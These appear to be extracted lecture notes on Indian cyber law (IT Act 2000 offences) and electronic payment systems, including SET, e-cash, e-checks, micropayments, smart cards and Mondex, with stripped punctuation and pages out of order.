Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 6
6
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Credit cards
It is a Plastic Card having a Magnetic Number and code on it
It has Some fixed amount to spend
Customer has to repay the spend amount after sometime
PREPARED BY ARUN PRATAP SINGH 7
7
Processing a Credit cards payment ndash
Risk in using Credit cards -
Operational Risk
Credit Risk
Legal Risk
Secure Electronic Transaction (SET) Protocol
Jointly designed by MasterCard and Visa with backing of Microsoft Netscape IBM
GTE SAIC and others
Designed to provide security for card payments as they travel on the Internet
Contrasted with Secure Socket Layers (SSL) protocol SET validates consumers
and merchants in addition to providing secure transmission
SET specification
Uses public key cryptography and digital certificates for validating both
consumers and merchants
PREPARED BY ARUN PRATAP SINGH 8
8
Provides privacy data integrity user and merchant authentication and consumer
nonrepudiation
The SET Protocol
What Is Payment Gateways
A payment gateway is an e-commerce application service provider service that
authorizes payments for e-businesses online Shopping etc
PREPARED BY ARUN PRATAP SINGH 9
9
Payment gateway protects credit cards details encrypting sensitive information such
as credit card numbers to ensure that information passes securely between the
customer and the merchant and also between merchant and payment processor
How It works
Payments In India
Going the e-way
e-PAYMENT SYSTEM IN INDIA
bull Ever-increasing technology changes
bull Growing Internet access and mobile subscriber base
bull Rising consumer confidence
bull Convenient deliverypayment models
bull India has been one of the fastest growing country for payment cards in the Asia-Pacific
region
bull India currently has approximately 130 million cards (both debit and credit) in circulation
PREPARED BY ARUN PRATAP SINGH 10
10
GROWTH IN e-PAYMENT SYSTEM
REGULATION-
The Reserve Bank of India (RBI) has been supportive in the development of electronic
payments
In this direction the ldquoPayments and Settlement System Actrdquo was enacted
Apart from being supporting the RBI has also initiated various programs to encourage e-
payments
CHANNELS OF PAYMENT-
Indian banks have put in place various channels of electronic payments in place to
encourage customers to adopt the electronic mode
Channels like the Internet mobile ATMs and drop boxes are some of the most
frequently used channels apart from bank branches
MARKET MAPPING-
E-payments processing market has two major players namely
Tech Process and Bill Desk which is a pure play electronic transaction processing company
The Indian Payment System Is Transforming From Paper Mode To Electronic Mode
Two main reasons for such shift are-
PREPARED BY ARUN PRATAP SINGH 11
11
1 The regulator has mandated routing all high-value transactions electronically to minimize
movement of money and risk
2 At the retail end customers are realizing the efficiency of electronic payments
SHIFTS IN THE PAYMENT SYSTEM
TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT
bull Electronic Clearing Service (Credit and Debit)
bull National Electronic Fund Transfer (NEFT)
THE RULING PLASTIC MONEY
Credit cards
Debit cards
ATM Cards
PayPal
PayPal is a global e-commerce business allowing payments and money transfers to be made
through the Internet Online money transfers serve as electronic alternatives to paying with
traditional paper methods such as checks and money orders It is subject to the US economic
sanction list and other rules and interventions required by US laws or government PayPal is an
acquirer performing payment processing for online vendors auction sites and other commercial
PREPARED BY ARUN PRATAP SINGH 12
12
users for which it charges a fee It may also charge a fee for receiving money proportional to the
amount received The fees depend on the currency used the payment option used the country
of the sender the country of the recipient the amount sent and the recipients account type In
addition eBay purchases made by credit card through PayPal may incur extra fees if the buyer
and seller use different currencies On October 3 2002 PayPal became a wholly owned
subsidiary of eBay Its corporate headquarters are in San Jose California United States at eBays
North First Street satellite office campus The company also has significant operations in Omaha
Scottsdale Charlotte and Austin in the United States Chennai in India Dublin in Ireland
Kleinmachnow in Germany and Tel Aviv in Israel From July 2007 PayPal has operated across
the European Union as a Luxembourg-based bank
Google Wallet
Google Wallet was launched in 2011 serving a similar function as PayPal to facilitate payments
and transfer money online It also features highly robust security and additional features such as
the ability to send payments as attachments via email
PREPARED BY ARUN PRATAP SINGH 13
13
CHARACTERISTICS OF PAYMENT SYSTEM
There is no paper involved so electronic payments can be effected directly from home or office
Fast efficient safe secure and generally less costly than paper-based alternatives eg cheques
Electronic payments are fully traceable
In Ireland the clearing time for standard electronic payments is next day value for interbank
transfers subject to the payment instruction being received ahead of lsquoshut-offrsquo times which can
vary from bank to bank Payment instructions received after the lsquoshut-offrsquo time will be processed
one working day later
Most banks offer same day value for payments made to other accounts held in that same bank
Many banks offer same day money transfer inter-bank services for large value payments
Unlike cheques electronic payments donrsquot lsquobouncersquo ndash as payments will not be effected unless the
funds are available in the first place
PREPARED BY ARUN PRATAP SINGH 14
14
Features of Payment Methods
bull Anonymity whether the payment method is anonymous
bull Security whether the payment method is secure
bull Overhead cost the overhead cost of processing a payment
bull Transferability whether a payment can be carried out without the involvement of a
third party
bull Divisibility whether a payment can be divided into arbitrary small payments whose
sum is equal to the original payment
bull Acceptability whether the payment method is supported globally
4C PAYMENTS METHODS
To make the e-commerce system functional we also need to incorporate payment
functions into the system
In the physical world there are 4 types of payment methods
bull Cash
bull Credit card
bull Check
bull Creditdebit (Fund Transfer)
bull Payment method should be
ndash Very secure
ndash Having Low overhead cost
ndash Transferable
ndash Acceptable anywhere
ndash Divisible
ndash Anonymous
Comparison of the 4C payment methods
PREPARED BY ARUN PRATAP SINGH 15
15
SET PROTOCOL FOR CREDIT CARD PAYMENT
bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce
bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection
Advantage of SSL
bull It ensures the secure transmission of credit card information over the internet
Disadvantage of SSL
bull It is not a complete credit card payment method
bull For example it cannot support on-line credit card authorization
SET is specially developed to provide secure credit card payment over the internet
It is now widely supported by major credit card companies including Visa and
MasterCard
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
